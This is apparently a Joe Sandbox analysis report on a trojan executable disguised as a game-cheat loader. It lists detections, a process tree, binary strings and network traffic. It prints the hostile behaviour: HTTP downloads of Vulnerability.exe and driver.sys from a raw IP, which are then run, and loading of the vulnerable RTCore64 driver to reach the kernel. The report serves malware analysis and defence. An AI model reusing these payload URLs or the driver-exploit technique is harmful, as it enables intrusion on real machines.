Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Iyto7FYCJO.exe

Overview

General Information

Sample name:Iyto7FYCJO.exe
renamed because original name is a hash value
Original sample name:e12627a292cf6a7d32adb932adbd2b3b.exe
Analysis ID:1538236
MD5:e12627a292cf6a7d32adb932adbd2b3b
SHA1:2f6bf97cd38104937b7f47be38a00f0cea9a6f4a
SHA256:eeca777e359e475f4bf1d137bd60dc0194e9520c0047a388ef28d383dc04250e
Tags:64exetrojan
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Accesses win32k, likely to find offsets for exploits
Detected VMProtect packer
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect debuggers (CloseHandle check)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • Iyto7FYCJO.exe (PID: 1308 cmdline: "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5: E12627A292CF6A7D32ADB932ADBD2B3B)
    • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1892 cmdline: C:\Windows\system32\cmd.exe /c cd C:\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 5260 cmdline: C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • Vulnerability.exe (PID: 5460 cmdline: C:\Windows\Vulnerability.exe C:\Windows\driver.sys MD5: 8619AFEC8BD66B2C589FC987D7D0B194)
        • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6128 cmdline: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 | find /i /v "md5" | find /i /v "certutil" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • certutil.exe (PID: 940 cmdline: certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 MD5: F17616EC0522FC5633151F7CAA278CAA)
      • find.exe (PID: 6656 cmdline: find /i /v "md5" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
      • find.exe (PID: 5060 cmdline: find /i /v "certutil" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 4092 cmdline: C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7044 cmdline: cmd /C "color b && title Error && echo SSL connect error && timeout /t 5" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2284 cmdline: timeout /t 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • WerFault.exe (PID: 1812 cmdline: C:\Windows\system32\WerFault.exe -u -p 1308 -s 1708 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Iyto7FYCJO.exeAvira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sysReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exeReversingLabs: Detection: 55%
Source: C:\Windows\Vulnerability.exeReversingLabs: Detection: 55%
Source: C:\Windows\driver.sysReversingLabs: Detection: 62%
Source: Iyto7FYCJO.exeReversingLabs: Detection: 42%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exeJoe Sandbox ML: detected
Source: C:\Windows\Vulnerability.exeJoe Sandbox ML: detected
Source: Iyto7FYCJO.exeJoe Sandbox ML: detected
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_d1808002-5

Exploits

barindex
Source: C:\Windows\Vulnerability.exeFile opened: C:\Windows\System32\win32k.sysJump to behavior
Source: unknownHTTPS traffic detected: 172.67.72.57:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: Iyto7FYCJO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mbols/wi.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: Iyto7FYCJO.exe, 00000000.00000003.2159382259.0000022AC022F000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, driver.sys.0.dr, driver[1].sys.0.dr
Source: Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb`2 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbW source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69D00D000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106140610.000002B69E957000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: s/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69D030000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1V source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5.sysF source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdbE140.dll source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1' source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\Vulnerability.exeCode function: 5_2_00007FF7738F3B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,5_2_00007FF7738F3B60
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:15:02 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 03 Oct 2024 17:41:18 GMTETag: "23800-623960fde9891"Accept-Ranges: bytesContent-Length: 145408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d e7 f2 38 39 86 9c 6b 39 86 9c 6b 39 86 9c 6b 30 fe 0f 6b 2f 86 9c 6b 3f 07 98 6a 33 86 9c 6b 3f 07 9f 6a 3d 86 9c 6b 3f 07 99 6a 1b 86 9c 6b 3f 07 9d 6a 3f 86 9c 6b 72 fe 9d 6a 28 86 9c 6b 39 86 9d 6b 31 87 9c 6b 56 07 95 6a 3e 86 9c 6b 56 07 63 6b 38 86 9c 6b 56 07 9e 6a 38 86 9c 6b 52 69 63 68 39 86 9c 6b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3e d7 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 4e 01 00 00 ee 00 00 00 00 00 00 b4 48 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 02 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 06 02 00 cc 01 00 00 00 50 02 00 e8 01 00 00 00 40 02 00 30 0f 00 00 00 00 00 00 00 00 00 00 00 60 02 00 08 01 00 00 b0 d7 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 01 00 28 00 00 00 70 d6 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 60 01 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 4c 01 00 00 10 00 00 00 4e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 cb 00 00 00 60 01 00 00 cc 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 0c 00 00 00 30 02 00 00 06 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 30 0f 00 00 00 40 02 00 00 10 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e8 01 00 00 00 50 02 00 00 02 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 01 00 00 00 60 02 00 00 02 00 00 00 36 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:15:03 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 03 Oct 2024 19:27:48 GMTETag: "2a00-623978cbb6377"Accept-Ranges: bytesContent-Length: 10752Keep-Alive: timeout=5, max=99Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 11 41 b6 a6 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 54 20 d8 f5 1e 58 d9 f4 56 20 d8 f5 55 20 d9 f5 4e 20 d8 f5 1e 58 db f4 53 20 d8 f5 1e 58 dc f4 50 20 d8 f5 3a a1 dd f4 54 20 d8 f5 3a a1 da f4 54 20 d8 f5 52 69 63 68 55 20 d8 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 34 f0 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 18 00 00 00 0e 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 80 00 00 00 04 00 00 74 b0 00 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 24 00 00 00 60 32 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 31 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d2 12 00 00 00 10 00 00 00 14 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 50 06 00 00 00 30 00 00 00 08 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 8c 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 fc 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 04 03 00 00 00 60 00 00 00 04 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 62 2e 72 65 6c 6f 63 00 00 24 00 00 00 00 70 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox ViewIP Address: 172.67.72.57 172.67.72.57
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global trafficHTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /driver.sys HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: global trafficHTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /driver.sys HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: keyauth.win
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/Vulnerability.exe
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/Vulnerability.exeC9?
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/Vulnerability.exeC:
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/Vulnerability.exev
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driver.sys
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driver.sysC:
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driver.sysW
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driver.syse
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driver.sysl
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
